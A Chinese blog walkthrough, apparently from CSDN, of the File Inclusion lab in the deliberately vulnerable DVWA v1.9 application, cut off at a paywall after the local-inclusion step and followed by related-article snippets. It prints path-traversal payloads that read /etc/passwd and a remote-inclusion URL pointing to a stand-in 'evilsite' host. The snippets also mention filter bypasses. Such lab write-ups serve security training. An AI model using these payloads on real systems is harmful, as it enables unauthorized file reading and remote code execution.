DVWA V1.9:File Inclusion(文件包含)

最新推荐文章于 2024-08-16 11:54:28 发布
最新推荐文章于 2024-08-16 11:54:28 发布
阅读量550 收藏
点赞数
分类专栏: 靶场实战 文章标签: 安全 dvwa 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/104080569
版权
本文详细介绍了DVWA V1.9中的文件包含漏洞,包括Low、Medium、High和Impossible四个级别。低级别下,服务器未对page参数进行过滤,存在LFI和RFI风险。Medium级别通过str_replace函数过滤,但可被双写绕过。High级别使用fnmatch函数限制,但file协议仍可被利用。Impossible级别采用白名单防护,彻底解决文件包含漏洞。文章还讨论了漏洞利用和防御策略。
摘要由CSDN通过智能技术生成

DVWA V1.9:File Inclusion(文件包含)

File Inclusion 介绍

一些Web应用程序允许用户指定直接用于文件流的输入,或者允许用户将文件上载到服务器。
在稍后的时间,Web应用程序访问Web应用上下文中的用户提供的输入。
通过这样做,Web应用程序允许潜在的恶意文件执行。

如果所选择的文件在目标机上是本地的,则称为“本地文件包含(LFI)”。
但是文件也可以包含在其他机器上,然后攻击是一个“远程文件包含(RFI)”。

当RFI不是一个选项。使用LFI(如文件上传和目录遍历)的另一个漏洞通常可以达到相同的效果。

注意,“文件包含”一词与“任意文件访问”或“文件泄露”不一样。
在这里插入图片描述

Low 级别

核心代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

可以看到,服务器端对page参数没有做任何的过滤跟检查。
服务器期望用户的操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。

需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

官方提示

这允许直接输入到许多PHP函数之一这将包括执行时的内容。
取决于Web服务的配置将取决于RFI是可能的。

Spoiler: LFI: ?page=../../../../../../etc/passwd.
Spoiler: RFI: ?page=http://www.evilsite.com/evil.php.

漏洞利用

1.本地文件包含

构造url
http://43.247.91.228:81/vulnerabilities/fi/?page=../../../../../../etc/passwd

在这里插入图片描述
2.远程文件包含

最低0.47元/天 解锁文章
CNwanku
关注
专栏目录
DVWA-文件包含
Darklord.W
04-09 230
低中高步骤截图 低: 未进行任何过滤 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=/etc/passwd 查看目录 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=c:\boot.ini http://192.168.8.135/dvwa/vul...
DVWA V1.9:File Upload(文件上传)
qq_43233085的博客
01-25 754
DVWA V1.9:File Upload(文件上传)File Inclusion 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 File Inclusion 介绍 上传的文件是Web应用程序的一大风险。 许多攻击的第一步是让一些代码攻击系统,然后攻击者只需要找到一种方法来执行代码...
DVWA v1.9 新手指南
CERES123456的博客
09-01 399
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 官网地址:http://www.dvwa.co.uk/ github地址:https://github.com...
网络安全 DVWA通关指南 DVWA File Inclusion文件包含
最新发布
YueXuan_521的博客
08-16 1068
网络安全 DVWA通关指南 DVWA File Inclusion文件包含) 但我们可以使用file伪协议读取到文件。(这个地方需要文件的绝对路径,与Low级别不同,这里的报错信息需要提交以file开头的不存在文件或路径,否则会返回统一错误页面)文件包含漏洞的产生原因是 PHP 语言在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
DVWA平台v1.9-Brute Force
andiao1218的博客
04-15 285
Low: 随便输一下用户名,密码,test 点击Login 显示用户名或密码错误 在owasp-zap查看数据包 点击,就会转到这 右键,点击Fuzz 点击Remove删除默认的 选定参数变量值,点击Add 再点击Add 然后输入几个可能的用户名,点击添加 然后点击ok 对password参数也是一样的操作,...
DVWA文件包含
weixin_46429206的博客
12-03 3161
Windows 本地文件包含 低 查看源码 不存在过滤,可直接读取或执行文件内容 中 源码中存在一些过滤规则,我们只需要进行复写或者大小写转换即可绕过 1、使用绝对路径 2、使用相对路径复写或者是大小写绕过 高 要求文件变量以file开头,因此远程文件包含失效,只能使用本地文件包含,且需要用到file协议 Linux 低 中 因为源码里过滤的是http和https,因此不影响我们使用相对路径和绝对路径 远程文件包含 低 Shell.php内容 攻击者访问受害者shell.php文件
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
3. **文件包含漏洞**:DVWA的"File Inclusion"模块让用户了解文件包含漏洞的危害。通过不当的动态文件包含,攻击者可能能读取服务器上的任意文件,甚至执行系统命令。 4. **弱认证与会话管理**:DVWA的...
DVWA文件包含漏洞(File Inclusion
qq_54537919的博客
06-27 1175
DVWA文件包含漏洞(File Inclusion
DVWA的压缩文件安装包下载
09-30
4. **文件包含漏洞**:在"File Inclusion"环节,你可以看到如何利用错误配置的文件包含功能来读取服务器上的任意文件,甚至执行服务器上的代码。了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话...
DVWA 文件包含
m0_56107268的博客
04-30 260
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
dvwa文件包含
qq_52986156的博客
10-17 397
直接分析源码发现过滤方式是使用的替换函数str_replace过滤了http://和https://和相对路径的表示符号../替换为空字符串,此处可以双写绕过waf。本地:测试文件未在上层所以不影响直接使用,要是需要读取上层文件同理在使用../的时候插入成双写模式..././根据页面的三个文件点击可以发现后端是get方式用url栏的page传参也可以直接分析源码看到是未作任何过滤。对应的文件存放路径如下(前面是网络访问路径,后面是本地路径)然后我们构造其他不存在的文件有回显报错信息爆出文件路径。
DVWA---文件包含
xiaoxiao的博客
11-27 1891
文件包含定义 开发人员将相同的函数写入单独文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞定义 文件包含漏洞是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行...
dvwa--文件包含
weixin_44769042的博客
09-29 259
目录 low 本地文件包含 远程文件包含 medium high low 查看源码,它会get一个page 然后会交给include() 函数去包含,并读取内容出来 尝试手动修改为一个不存在于链接跳转中的文件 发现了提示,这是个未列出的文件 能执行访问,说明,此处可以包含其他文件 本地文件包含 我们尝试用它来包含获取系统的一些敏感文件 看看能不能通过相对路径去访问(提前在网站根目录创建了一个1.txt) 可根据故意输不存在的文件爆出路径去往前跳 文件包
DVWA——文件包含
m0_74426634的博客
04-06 1654
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
DVWAFile Inclusion
谢公子的博客
08-05 1412
File Inclusion File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件...
DVWA-文件包含File Inclusion
qyy970525的博客
11-20 487
DVWA-文件包含File InclusionFile InclusionLOW漏洞利用我们可以读取他们的数据Medium漏洞利用High漏洞利用Impossible File Inclusion File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值